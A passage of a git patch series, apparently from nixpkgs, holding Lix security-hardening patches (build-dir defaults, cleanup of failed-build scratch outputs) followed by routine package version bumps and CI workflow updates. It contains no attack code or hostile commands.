networking.hosts."192.168.1.1" = [ "good" "bad" ]; + + virtualisation.writableStore = true; + +-- +2.49.0 + + +From 05eba34893122d395774b4ee5eaf4c03ae588ea0 Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Sun, 30 Mar 2025 16:45:34 +0200 +Subject: [SECURITY FIX 11/12] libstore: don't default build-dir to temp-dir + +if a build directory is accessible to other users it is possible to +smuggle data in and out of build directories. usually this ins only +a build purity problem, but in combination with other issues it can +be used to break out of a build sandbox. to prevent this we default +to using a subdirectory of nixStateDir (which is more restrictive). + +Change-Id: Iacfc9b50534de158618c815f9fb99d7dae1be4d0 +--- + doc/manual/rl-next/build-dir-mandatory.md | 12 +++++++++++ + lix/libstore/build/local-derivation-goal.cc | 4 +++- + lix/libstore/settings/build-dir.md | 18 ++++++++++++---- + misc/systemd/nix-daemon.conf.in | 3 ++- + .../build-remote-trustless-should-fail-0.sh | 1 - + tests/functional/build-remote-trustless.sh | 1 - + tests/functional/build-remote.sh | 1 - + tests/functional/check.sh | 21 ------------------- + tests/functional/supplementary-groups.sh | 1 - + 9 files changed, 31 insertions(+), 31 deletions(-) + create mode 100644 doc/manual/rl-next/build-dir-mandatory.md + +diff --git a/doc/manual/rl-next/build-dir-mandatory.md b/doc/manual/rl-next/build-dir-mandatory.md +new file mode 100644 +index 000000000..6f69bbba3 +--- /dev/null ++++ b/doc/manual/rl-next/build-dir-mandatory.md +@@ -0,0 +1,12 @@ ++--- ++synopsis: "`build-dir` no longer defaults to `temp-dir`" ++cls: [] ++category: "Fixes" ++credits: [horrors] ++--- ++ ++The directory in which temporary build directories are created no longer defaults ++to the value of the `temp-dir` setting to avoid builders making their directories ++world-accessible. This behavior has been used to escape the build sandbox and can ++cause build impurities even when not used maliciously. We now default to `builds` ++in `NIX_STATE_DIR` (which is `/nix/var/nix/builds` in the default configuration). +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 7ccb0ad33..2e22f2544 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -435,10 +435,12 @@ try { + }); + } + ++ createDirs(settings.buildDir.get()); ++ + /* Create a temporary directory where the build will take + place. */ + tmpDir = createTempDir( +- settings.buildDir.get().value_or(""), ++ settings.buildDir.get(), + "nix-build-" + std::string(drvPath.name()), + false, + false, +diff --git a/lix/libstore/settings/build-dir.md b/lix/libstore/settings/build-dir.md +index f518d52a5..738368622 100644 +--- a/lix/libstore/settings/build-dir.md ++++ b/lix/libstore/settings/build-dir.md +@@ -1,14 +1,24 @@ + --- + name: build-dir + internalName: buildDir +-settingType: PathsSetting> +-default: null ++settingType: PathsSetting ++defaultText: "`«nixStateDir»/builds`" ++defaultExpr: nixStateDir + "/builds" + --- + The directory on the host, in which derivations' temporary build directories are created. + +-If not set, Nix will use the [`temp-dir`](#conf-temp-dir) setting if set, otherwise the system temporary directory indicated by the `TMPDIR` environment variable. +-Note that builds are often performed by the Nix daemon, so its `TMPDIR` is used, and not that of the Nix command line interface. ++If not set, Lix will use the `builds` subdirectory of its configured state directory. ++Lix will create this directory automatically with suitable permissions if it does not ++exist, otherwise its permissions must allow all users to traverse the directory (i.e. ++it must have `o+x` set, in unix parlance) for non-sandboxed builds to work correctly. + + This is also the location where [`--keep-failed`](@docroot@/command-ref/opt-common.md#opt-keep-failed) leaves its files. + + If Nix runs without sandbox, or if the platform does not support sandboxing with bind mounts (e.g. macOS), then the [`builder`](@docroot@/language/derivations.md#attr-builder)'s environment will contain this directory, instead of the virtual location [`sandbox-build-dir`](#conf-sandbox-build-dir). ++ ++> Important: ++> ++> `build-dir` must not be set to a world-writable directory. Placing temporary build ++> directories in a world-writable place allows other users to access or modify build ++> data that is currently in use. This alone is merely an impurity, but combined with ++> another factor this has allowed malicious derivations to escape the build sandbox. +diff --git a/misc/systemd/nix-daemon.conf.in b/misc/systemd/nix-daemon.conf.in +index e7b264234..a0ddc4019 100644 +--- a/misc/systemd/nix-daemon.conf.in ++++ b/misc/systemd/nix-daemon.conf.in +@@ -1 +1,2 @@ +-d @localstatedir@/nix/daemon-socket 0755 root root - - ++d @localstatedir@/nix/daemon-socket 0755 root root - - ++d @localstatedir@/nix/builds 0755 root root 7d - +diff --git a/tests/functional/build-remote-trustless-should-fail-0.sh b/tests/functional/build-remote-trustless-should-fail-0.sh +index 1582a7b32..e938e63a2 100644 +--- a/tests/functional/build-remote-trustless-should-fail-0.sh ++++ b/tests/functional/build-remote-trustless-should-fail-0.sh +@@ -8,7 +8,6 @@ requireSandboxSupport + [[ $busybox =~ busybox ]] || skipTest "no busybox" + + unset NIX_STORE_DIR +-unset NIX_STATE_DIR + + # We first build a dependency of the derivation we eventually want to + # build. +diff --git a/tests/functional/build-remote-trustless.sh b/tests/functional/build-remote-trustless.sh +index 81e5253bf..a0733fd4a 100644 +--- a/tests/functional/build-remote-trustless.sh ++++ b/tests/functional/build-remote-trustless.sh +@@ -2,7 +2,6 @@ requireSandboxSupport + [[ $busybox =~ busybox ]] || skipTest "no busybox" + + unset NIX_STORE_DIR +-unset NIX_STATE_DIR + + remoteDir=$TEST_ROOT/remote + +diff --git a/tests/functional/build-remote.sh b/tests/functional/build-remote.sh +index 9b2f5feaf..c7aa09745 100644 +--- a/tests/functional/build-remote.sh ++++ b/tests/functional/build-remote.sh +@@ -3,7 +3,6 @@ requireSandboxSupport + + # Avoid store dir being inside sandbox build-dir + unset NIX_STORE_DIR +-unset NIX_STATE_DIR + + function join_by { local d=$1; shift; echo -n "$1"; shift; printf "%s" "${@/#/$d}"; } + +diff --git a/tests/functional/check.sh b/tests/functional/check.sh +index fc63b9e21..e6d017aa1 100644 +--- a/tests/functional/check.sh ++++ b/tests/functional/check.sh +@@ -49,27 +49,6 @@ test_custom_build_dir() { + } + test_custom_build_dir + +-test_custom_temp_dir() { +- # like test_custom_build_dir(), but uses the temp-dir setting instead +- # build-dir inherits from temp-dir when build-dir is unset +- local customTempDir="$TEST_ROOT/custom-temp-dir" +- +- mkdir "$customTempDir" +- nix-build check.nix -A failed --argstr checkBuildId $checkBuildId \ +- --no-out-link --keep-failed --option temp-dir "$customTempDir" 2> $TEST_ROOT/log || status=$? +- [ "$status" = "100" ] +- [[ 1 == "$(count "$customTempDir/nix-build-"*)" ]] +- local buildDir="$customTempDir/nix-build-"* +- grep $checkBuildId $buildDir/checkBuildId +- +- # also check a separate code path that doesn't involve build-dir +- # nix-shell uses temp-dir for its rcfile path +- rcpath=$(NIX_BUILD_SHELL=$SHELL nix-shell check.nix -A deterministic --option temp-dir "$customTempDir" --run 'echo $0' 2> $TEST_ROOT/log) +- # rcpath is /nix-shell-*/rc +- [[ $rcpath = "$customTempDir"/* ]] +-} +-test_custom_temp_dir +- + test_shell_preserves_tmpdir() { + # ensure commands that spawn interactive shells don't overwrite TMPDIR with temp-dir + local envTempDir=$TEST_ROOT/shell-temp-dir-env +diff --git a/tests/functional/supplementary-groups.sh b/tests/functional/supplementary-groups.sh +index d18fb2414..c1a949eb4 100644 +--- a/tests/functional/supplementary-groups.sh ++++ b/tests/functional/supplementary-groups.sh +@@ -10,7 +10,6 @@ unshare --mount --map-root-user bash < +Date: Sat, 26 Apr 2025 20:38:58 +0200 +Subject: [SECURITY FIX 12/12] libstore/build: automatic clean up of + unsuccessfully built scratch outputs + +When a build fails, its scratch output paths are not cleaned up. + +Until recently, this was deemed not a problem but as part of the effort +to harden the Nix builds and protect these paths against being part of a +staged attack (race conditions, etc.), we automatically cleanup after +failed builds. + +Change-Id: I58481b1cc83826298b9d80d37fecf81f117ccb09 +Signed-off-by: Raito Bezarius +--- + .../aggressive-derivation-output-cleanups.md | 15 +++++++ + lix/libstore/build/local-derivation-goal.cc | 41 +++++++++++++++---- + lix/libstore/build/local-derivation-goal.hh | 15 ++++++- + tests/nixos/default.nix | 3 ++ + tests/nixos/non-chroot-misc/default.nix | 34 +++++++++++++++ + 5 files changed, 99 insertions(+), 9 deletions(-) + create mode 100644 doc/manual/rl-next/aggressive-derivation-output-cleanups.md + create mode 100644 tests/nixos/non-chroot-misc/default.nix + +diff --git a/doc/manual/rl-next/aggressive-derivation-output-cleanups.md b/doc/manual/rl-next/aggressive-derivation-output-cleanups.md +new file mode 100644 +index 000000000..7e94b99df +--- /dev/null ++++ b/doc/manual/rl-next/aggressive-derivation-output-cleanups.md +@@ -0,0 +1,15 @@ ++--- ++synopsis: "Always clean up scratch paths after derivations failed to build" ++issues: [] ++cls: [] ++category: "Fixes" ++credits: ["raito", "horrors"] ++--- ++ ++Previously, scratch paths created during builds were not always cleaned up if ++the derivation failed, potentially leaving behind unnecessary temporary files ++or directories in the Nix store. ++ ++This fix ensures that such paths are consistently removed after a failed build, ++improving Nix store hygiene, hardening Lix against mis-reuse of failed builds ++scratch paths. +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 2e22f2544..13bda5df9 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -393,9 +393,13 @@ void LocalDerivationGoal::cleanupPostOutputsRegisteredModeCheck() + + void LocalDerivationGoal::cleanupPostOutputsRegisteredModeNonCheck() + { +- /* Delete unused redirected outputs (when doing hash rewriting). */ +- for (auto & i : redirectedOutputs) +- deletePath(worker.store.Store::toRealPath(i.second)); ++ /* In the past, redirected outputs were manually tracked for deletion. ++ * Now that we have the scratch outputs cleaner which are a superset of ++ * redirected outputs, we just fire all uncancelled automatic deleters now. ++ * ++ * This should clean up any paths that IS NOT registered in the database. ++ */ ++ scratchOutputsCleaner.clear(); + + /* Delete the chroot (if we were using one). */ + autoDelChroot.reset(); /* this runs the destructor */ +@@ -483,6 +487,10 @@ try { + to use a temporary path */ + makeFallbackPath(status.known->path); + scratchOutputs.insert_or_assign(outputName, scratchPath); ++ /* Schedule this scratch output path for automatic deletion ++ * if we do not cancel it, e.g. when registering the outputs. ++ */ ++ scratchOutputsCleaner.emplace(outputName, worker.store.printStorePath(scratchPath)); + + /* Substitute output placeholders with the scratch output paths. + We'll use during the build. */ +@@ -505,8 +513,6 @@ try { + std::string h2 { scratchPath.hashPart() }; + inputRewrites[h1] = h2; + } +- +- redirectedOutputs.insert_or_assign(std::move(fixedFinalPath), std::move(scratchPath)); + } + + /* Construct the environment passed to the builder. */ +@@ -1966,7 +1972,9 @@ try { + } + + /* Don't register anything, since we already have the +- previous versions which we're comparing. */ ++ previous versions which we're comparing. ++ NOTE: this means that the `.check` path will be automatically deleted. ++ */ + continue; + } + +@@ -1990,8 +1998,13 @@ try { + /* If it's a CA path, register it right away. This is necessary if it + isn't statically known so that we can safely unlock the path before + the next iteration */ +- if (newInfo.ca) ++ if (newInfo.ca) { + TRY_AWAIT(localStore.registerValidPaths({{newInfo.path, newInfo}})); ++ /* Cancel automatic deletion of that output if it was a scratch output. */ ++ if (auto cleaner = scratchOutputsCleaner.extract(outputName)) { ++ cleaner.mapped().cancel(); ++ } ++ } + + infos.emplace(outputName, std::move(newInfo)); + } +@@ -2030,6 +2043,13 @@ try { + infos2.insert_or_assign(newInfo.path, newInfo); + } + TRY_AWAIT(localStore.registerValidPaths(infos2)); ++ ++ /* Cancel automatic deletion of that output if it was a scratch output that we just registered. */ ++ for (auto & [outputName, _ ] : infos) { ++ if (auto cleaner = scratchOutputsCleaner.extract(outputName)) { ++ cleaner.mapped().cancel(); ++ } ++ } + } + + /* In case of a fixed-output derivation hash mismatch, throw an +@@ -2057,6 +2077,13 @@ try { + builtOutputs.emplace(outputName, thisRealisation); + } + ++ /* NOTE: At this point, all outputs MAY NOT have been registered. ++ * Therefore, there may remains auto-deleters pending in the cleaner list (`scratchOutputsCleaner`). ++ * ++ * They will be finally deleted but we have no way to assert they all have been, e.g. ++ * `assert(scratchOutputsCleaner.size() == 0)` cannot be written. ++ */ ++ + co_return builtOutputs; + } catch (...) { + co_return result::current_exception(); +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index a0031e141..7e1b9a632 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -111,8 +111,6 @@ struct LocalDerivationGoal : public DerivationGoal + * Hash rewriting. + */ + StringMap inputRewrites, outputRewrites; +- typedef map RedirectedOutputs; +- RedirectedOutputs redirectedOutputs; + + /** + * The outputs paths used during the build. +@@ -129,6 +127,19 @@ struct LocalDerivationGoal : public DerivationGoal + * self-references. + */ + OutputPathMap scratchOutputs; ++ /** ++ * Output paths used during the build are scheduled for ++ * automatic cleanup unless they have been successfully built. ++ * ++ * `registerOutputs` take care of cancelling the cleanups ++ * and clearing this vector. ++ * ++ * `startBuilder` take care of filling this vector ++ * as `scratchOutputs` gets filled. ++ * ++ * This is a map from output names to automatic delete handles. ++ */ ++ std::map scratchOutputsCleaner; + + /** + * Path registration info from the previous round, if we're +diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix +index 2ad0923e1..7b9e11613 100644 +--- a/tests/nixos/default.nix ++++ b/tests/nixos/default.nix +@@ -164,6 +164,9 @@ in + + symlinkResolvconf = runNixOSTestFor "x86_64-linux" ./symlink-resolvconf.nix; + ++ # Use this test to test things that cannot easily be tested under chroot Nix stores in functional test suite. ++ non-chroot-misc = runNixOSTestFor "x86_64-linux" ./non-chroot-misc; ++ + noNewPrivilegesInSandbox = runNixOSTestFor "x86_64-linux" ./no-new-privileges/sandbox.nix; + + noNewPrivilegesOutsideSandbox = runNixOSTestFor "x86_64-linux" ./no-new-privileges/no-sandbox.nix; +diff --git a/tests/nixos/non-chroot-misc/default.nix b/tests/nixos/non-chroot-misc/default.nix +new file mode 100644 +index 000000000..93a66a595 +--- /dev/null ++++ b/tests/nixos/non-chroot-misc/default.nix +@@ -0,0 +1,34 @@ ++{ ... }: ++# Misc things we want to test inside of a non redirected, non chroot Nix store. ++let ++ nonAutoCleaningFailingDerivationCode = '' ++ derivation { ++ name = "scratch-failing"; ++ system = builtins.currentSystem; ++ builder = "/bin/sh"; ++ args = [ (builtins.toFile "builder.sh" "echo bonjour > $out; echo out: $out; false") ]; ++ } ++ ''; ++in ++{ ++ name = "non-chroot-sandbox-misc"; ++ ++ nodes.machine = { ++ }; ++ ++ testScript = { nodes }: '' ++ import re ++ start_all() ++ ++ # You might ask yourself why write such a convoluted thing? ++ # The condition for fooling Nix into NOT cleaning up the output path are non trivial and unclear. ++ # This is one of those: create a derivation, mkdir or touch the $out path, communicate it back. ++ # Even with a sandboxed Lix, you will observe leftovers before 2.93.0. After this version, this test passes. ++ result = machine.fail("""nix-build --substituters "" -E '${nonAutoCleaningFailingDerivationCode}' 2>&1""") ++ match = re.search(r'out: (\S+)', result) ++ assert match is not None, "Did not find Nix store path in the result of the failing build" ++ outpath = match.group(1).strip() ++ print(f"Found Nix store path: {outpath}") ++ machine.fail(f'stat {outpath}') ++ ''; ++} +-- +2.49.0 + From 6ff856f8db7b3b352cd31bf5b383e182a93cdf52 Mon Sep 17 00:00:00 2001 From: PerchunPak Date: Sat, 21 Jun 2025 14:59:34 +0200 Subject: [PATCH 68/73] appmenu-glib-translator: adress code review --- .../ap/appmenu-glib-translator/package.nix | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/pkgs/by-name/ap/appmenu-glib-translator/package.nix b/pkgs/by-name/ap/appmenu-glib-translator/package.nix index 88265a3086c0..310b3e5b5548 100644 --- a/pkgs/by-name/ap/appmenu-glib-translator/package.nix +++ b/pkgs/by-name/ap/appmenu-glib-translator/package.nix @@ -1,15 +1,13 @@ { lib, fetchFromGitLab, + stdenv, glib, - gtk3, + gobject-introspection, meson, ninja, pkg-config, - gobject-introspection, vala, - stdenv, - wrapGAppsHook3, }: stdenv.mkDerivation (finalAttrs: { pname = "appmenu-glib-translator"; @@ -19,7 +17,6 @@ stdenv.mkDerivation (finalAttrs: { owner = "vala-panel-project"; repo = "vala-panel-appmenu"; tag = finalAttrs.version; - fetchSubmodules = true; hash = "sha256-v5J3nwViNiSKRPdJr+lhNUdKaPG82fShPDlnmix5tlY="; }; @@ -30,19 +27,15 @@ stdenv.mkDerivation (finalAttrs: { ninja pkg-config - wrapGAppsHook3 + gobject-introspection vala ]; - buildInputs = [ - glib - gobject-introspection - gtk3 - ]; + propagatedBuildInputs = [ glib ]; meta = { - description = "GTK module that strips menus from all GTK programs, converts to MenuModel and sends to AppMenu"; - homepage = "https://gitlab.com/vala-panel-project/vala-panel-appmenu/-/tree/${finalAttrs.version}/subprojects/appmenu-gtk-module"; + description = "Library for translating from DBusMenu to GMenuModel"; + homepage = "https://gitlab.com/vala-panel-project/vala-panel-appmenu/-/tree/${finalAttrs.version}/subprojects/appmenu-glib-translator"; license = lib.licenses.lgpl3Plus; maintainers = with lib.maintainers; [ perchun ]; platforms = lib.platforms.linux; From 08881f6be70723e04aa9f978d8fb9d4bcc80da56 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Wed, 18 Jun 2025 06:02:33 +0000 Subject: [PATCH 69/73] crosvm: 0-unstable-2025-06-06 -> 0-unstable-2025-06-17 --- pkgs/by-name/cr/crosvm/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/cr/crosvm/package.nix b/pkgs/by-name/cr/crosvm/package.nix index eef6b3c0a398..f7dd05a63c6a 100644 --- a/pkgs/by-name/cr/crosvm/package.nix +++ b/pkgs/by-name/cr/crosvm/package.nix @@ -21,12 +21,12 @@ rustPlatform.buildRustPackage { pname = "crosvm"; - version = "0-unstable-2025-06-06"; + version = "0-unstable-2025-06-17"; src = fetchgit { url = "https://chromium.googlesource.com/chromiumos/platform/crosvm"; - rev = "7083e31d219cdcd57866c70144e1b39ddc008f0f"; - hash = "sha256-oZR4UcN8lDoqNoUFGLbIDDRO55noDX0xMWa8W0DbVl4="; + rev = "49e226a57f905b00e44a996c93d9a2439dcb86f3"; + hash = "sha256-+HtF9nBv6unnrav5Z84xSOhK+RrlOFBHed6SiuHAcfs="; fetchSubmodules = true; }; From ea10312659ed4de3533e25388c0615b59ed90df1 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Tue, 24 Jun 2025 18:26:59 +0200 Subject: [PATCH 70/73] workflows: nix: 2.29.0 -> 2.29.1 --- .github/workflows/build.yml | 2 +- .github/workflows/codeowners-v2.yml | 4 ++-- .github/workflows/eval.yml | 6 +++--- .github/workflows/lint.yml | 6 +++--- .github/workflows/reviewers.yml | 2 +- 5 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 20600d9d9a31..29c7c68d631f 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -49,7 +49,7 @@ jobs: mergedSha: ${{ inputs.mergedSha }} merged-as-untrusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true diff --git a/.github/workflows/codeowners-v2.yml b/.github/workflows/codeowners-v2.yml index 89908ede868d..97fcfc63bdd2 100644 --- a/.github/workflows/codeowners-v2.yml +++ b/.github/workflows/codeowners-v2.yml @@ -59,7 +59,7 @@ jobs: merged-as-untrusted: true target-as-trusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 - uses: cachix/cachix-action@0fc020193b5a1fa3ac4575aa3a7d3aa6a35435ad # v16 with: @@ -107,7 +107,7 @@ jobs: name: Request runs-on: ubuntu-24.04-arm steps: - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 # Important: Because we use pull_request_target, this checks out the base branch of the PR, not the PR head. # This is intentional, because we need to request the review of owners as declared in the base branch. diff --git a/.github/workflows/eval.yml b/.github/workflows/eval.yml index 71ba62cdf4c7..5999aedcb938 100644 --- a/.github/workflows/eval.yml +++ b/.github/workflows/eval.yml @@ -46,7 +46,7 @@ jobs: path: untrusted - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -166,7 +166,7 @@ jobs: path: trusted - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -243,7 +243,7 @@ jobs: merged-as-untrusted: true - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml index 4bf917d800db..0b2da1070d20 100644 --- a/.github/workflows/lint.yml +++ b/.github/workflows/lint.yml @@ -29,7 +29,7 @@ jobs: mergedSha: ${{ inputs.mergedSha }} merged-as-untrusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -61,7 +61,7 @@ jobs: mergedSha: ${{ inputs.mergedSha }} merged-as-untrusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -86,7 +86,7 @@ jobs: targetSha: ${{ inputs.targetSha }} target-as-trusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true diff --git a/.github/workflows/reviewers.yml b/.github/workflows/reviewers.yml index bd1d8aed7204..1d518133cf6d 100644 --- a/.github/workflows/reviewers.yml +++ b/.github/workflows/reviewers.yml @@ -35,7 +35,7 @@ jobs: sparse-checkout: ci - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true From b3bcdb74980477c6d18cadd5f576ecd033b907dc Mon Sep 17 00:00:00 2001 From: DontEatOreo <57304299+DontEatOreo@users.noreply.github.com> Date: Tue, 24 Jun 2025 19:25:12 +0300 Subject: [PATCH 71/73] warp-terminal: 0.2025.06.18.08.11.stable_03 -> 0.2025.06.20.22.47.stable_05 Changelog: https://docs.warp.dev/getting-started/changelog#id-2025.06.20-v0.2025.06.20.22.47 --- pkgs/by-name/wa/warp-terminal/versions.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/pkgs/by-name/wa/warp-terminal/versions.json b/pkgs/by-name/wa/warp-terminal/versions.json index 4182beae12c9..f94041720f7c 100644 --- a/pkgs/by-name/wa/warp-terminal/versions.json +++ b/pkgs/by-name/wa/warp-terminal/versions.json @@ -1,14 +1,14 @@ { "darwin": { - "hash": "sha256-wlFmfHBSwBh9UFq6by52fGYN2EftP793u3L57XSDDKQ=", - "version": "0.2025.06.18.08.11.stable_03" + "hash": "sha256-UJAirS6JFFLW0OsOYj8RNUfG85dRHnxXasNw2QHX1Xs=", + "version": "0.2025.06.20.22.47.stable_05" }, "linux_x86_64": { - "hash": "sha256-7CfqTRUMkqLXmJg7RQK0liVEhucMOgMtsJl4/lrg4XI=", - "version": "0.2025.06.18.08.11.stable_03" + "hash": "sha256-h0ODaO3SJcZAxFRFBYYjWXQYsRAemGizn/YA7AF36pw=", + "version": "0.2025.06.20.22.47.stable_05" }, "linux_aarch64": { - "hash": "sha256-iDXAchU/b2ApDsmV0dnkXI1o0VOaegYWz4DufHtPFJM=", - "version": "0.2025.06.18.08.11.stable_03" + "hash": "sha256-H4xldFBMpfu6UFGFA/IkA1zPFqhFN6abhfHTRdYNpGA=", + "version": "0.2025.06.20.22.47.stable_05" } } From 5c2cad16c820e8cf2527d5f14e7a7718b195eb18 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 16:54:13 +0000 Subject: [PATCH 72/73] vimix-gtk-themes: 2024-04-20 -> 2025-06-20 --- pkgs/by-name/vi/vimix-gtk-themes/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/vi/vimix-gtk-themes/package.nix b/pkgs/by-name/vi/vimix-gtk-themes/package.nix index 0680efbf689e..0231a5dccbd4 100644 --- a/pkgs/by-name/vi/vimix-gtk-themes/package.nix +++ b/pkgs/by-name/vi/vimix-gtk-themes/package.nix @@ -45,13 +45,13 @@ lib.checkListOfEnum "${pname}: theme variants" stdenvNoCC.mkDerivation rec { inherit pname; - version = "2024-04-20"; + version = "2025-06-20"; src = fetchFromGitHub { owner = "vinceliuice"; repo = "vimix-gtk-themes"; rev = version; - sha256 = "RbAdoix+UWKiLB+04YiPa0UwzO1fFLy56IG1MipmE+E="; + sha256 = "uRm6v+Zag4FO7nFVcHhZjVhOfdOeYBZYQym0IBR8+HU="; }; nativeBuildInputs = [ From 29c307117ba60a5590c51997540932355edfedbe Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 17:44:01 +0000 Subject: [PATCH 73/73] python3Packages.guidance-stitch: 0.1.4 -> 0.1.5 --- pkgs/development/python-modules/guidance-stitch/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/guidance-stitch/default.nix b/pkgs/development/python-modules/guidance-stitch/default.nix index 27a0c17bf2dd..403f774ee611 100644 --- a/pkgs/development/python-modules/guidance-stitch/default.nix +++ b/pkgs/development/python-modules/guidance-stitch/default.nix @@ -20,13 +20,13 @@ buildPythonPackage rec { pname = "guidance-stitch"; - version = "0.1.4"; + version = "0.1.5"; pyproject = true; src = fetchPypi { pname = "guidance_stitch"; inherit version; - hash = "sha256-Wthz02C2AU6hzQ+TTGs+sI73ejwHQRCStZXZts0i1+w="; + hash = "sha256-Kg0O3oZds4eFfUlKe8sakDYhwT9XGGnN4RCcLFVpzZU="; }; build-system = [